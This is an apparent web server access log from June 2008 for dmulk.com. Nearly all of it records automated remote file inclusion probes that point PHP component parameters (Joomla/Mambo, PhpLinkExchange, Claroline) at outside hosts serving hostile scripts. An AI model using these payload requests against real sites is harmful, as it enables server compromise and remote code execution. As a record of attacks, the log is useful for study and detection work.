74.53.196.178 - - [09/Jun/2008:11:33:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.196.178 - - [09/Jun/2008:11:33:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:33:50 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.246.21.79 - - [09/Jun/2008:11:33:55 -0700] "GET /errors.php?error=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
84.246.21.79 - - [09/Jun/2008:11:33:55 -0700] "GET /logs/errors.php?error=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:34:09 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:13 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:13 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.27.164 - - [09/Jun/2008:11:34:17 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.23 - - [09/Jun/2008:11:34:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.15.129.23 - - [09/Jun/2008:11:34:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:34:33 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:34:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [09/Jun/2008:11:34:34 -0700] "GET /logs/access_080429.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:44 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:34:44 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:34:53 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:34:54 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:34:54 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:35:24 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:35:26 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:35:26 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:35:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:35:30 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:35:31 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:35:33 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:35:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:35:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.164 - - [09/Jun/2008:11:35:41 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:35:45 -0700] "GET /logs/access_080309.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:35:54 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:36:12 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:36:12 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:36:15 -0700] "GET /logs/access_080513.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:36:22 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:36:22 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:36:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:36:23 -0700] "GET /logs/access_080513.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:11:36:34 -0700] "GET /logs//errors.php?error=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:11:36:35 -0700] "GET /logs//errors.php?error=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:11:36:37 -0700] "GET //errors.php?error=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:11:36:38 -0700] "GET //errors.php?error=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:36:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:36:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:37:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0041.jpg HTTP/1.1" 200 416115 "-" "Googlebot-Image/1.0" "dmulk.com"
85.234.133.173 - - [09/Jun/2008:11:37:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:11:37:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [09/Jun/2008:11:37:06 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.240.146 - - [09/Jun/2008:11:37:06 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:37:30 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:37:30 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:37:30 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:37:40 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:37:41 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:37:41 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:37:45 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:37:45 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:37:57 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:38:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0005.jpg HTTP/1.1" 200 445675 "-" "Googlebot-Image/1.0" "dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:38:03 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:38:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:38:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:38:04 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:38:05 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:38:05 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.98.71 - - [09/Jun/2008:11:38:06 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [09/Jun/2008:11:38:06 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:38:07 -0700] "GET /index.php?pagina=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 16825 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:38:07 -0700] "GET /logs/index.php?pagina=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:38:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:38:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.141.19 - - [09/Jun/2008:11:38:12 -0700] "GET /logs/errors.php?error=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.218.141.19 - - [09/Jun/2008:11:38:12 -0700] "GET /errors.php?error=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:38:22 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:11:38:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:11:38:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:38:32 -0700] "GET /logs/access_071225.log//adminfoot.php?path[docroot]=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:38:35 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:38:57 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:38:58 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:38:58 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:38:58 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:38:58 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:38:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:39:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:39:00 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:39:04 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:39:14 -0700] "GET /logs/access.log/index.php?pagina=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:39:18 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:39:18 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:39:25 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:39:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:39:32 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:39:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:39:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:11:39:35 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:11:39:35 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.7.108.240 - - [09/Jun/2008:11:39:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [09/Jun/2008:11:39:57 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [09/Jun/2008:11:40:02 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.218.141.19 - - [09/Jun/2008:11:40:02 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:40:28 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:40:28 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:40:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0008.jpg HTTP/1.1" 200 11168 "-" "Googlebot-Image/1.0" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:40:50 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:40:50 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
